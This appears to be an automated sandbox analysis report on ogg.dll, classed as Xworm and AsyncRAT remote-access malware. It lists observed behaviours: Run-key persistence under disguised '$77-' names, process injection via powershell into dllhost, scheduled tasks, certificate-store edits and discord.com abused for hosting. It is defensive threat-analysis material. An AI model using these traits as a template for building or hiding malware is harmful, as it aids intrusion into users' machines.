Analysis Overview
SHA256
4a4f65427e016b3c5ae0d2517a69db5f1cdc7a43d2c0a7957e8da5d6f378f063
Threat Level: Known bad
The file ogg.dll was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: AddClipboardFormatListener
NTFS ADS
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Checks processor information in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-22 05:58
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 05:58
Reported
2024-06-22 06:19
Platform
win11-20240611-en
Max time kernel
1226s
Max time network
1228s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 6964 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77-scchost | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 6964 set thread context of 7456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Resources\xworm fixed\1 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\2 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Resources\xworm fixed\2 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\3 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Resources\xworm fixed\3 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\4 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Tasks\SA.DAT | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\1 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\0 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Resources\xworm fixed\0 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed.zip | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133635095582291813" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dbb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000b386e46e69c4da01 | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000038fb036c69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000004aff016c69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000074f1f56b69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000006821f26b69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000900444648b4cd1118b70080036b11a030300000078000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\LogicalViewMode = "3" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Mode = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Windows\Explorer.EXE | N/A |
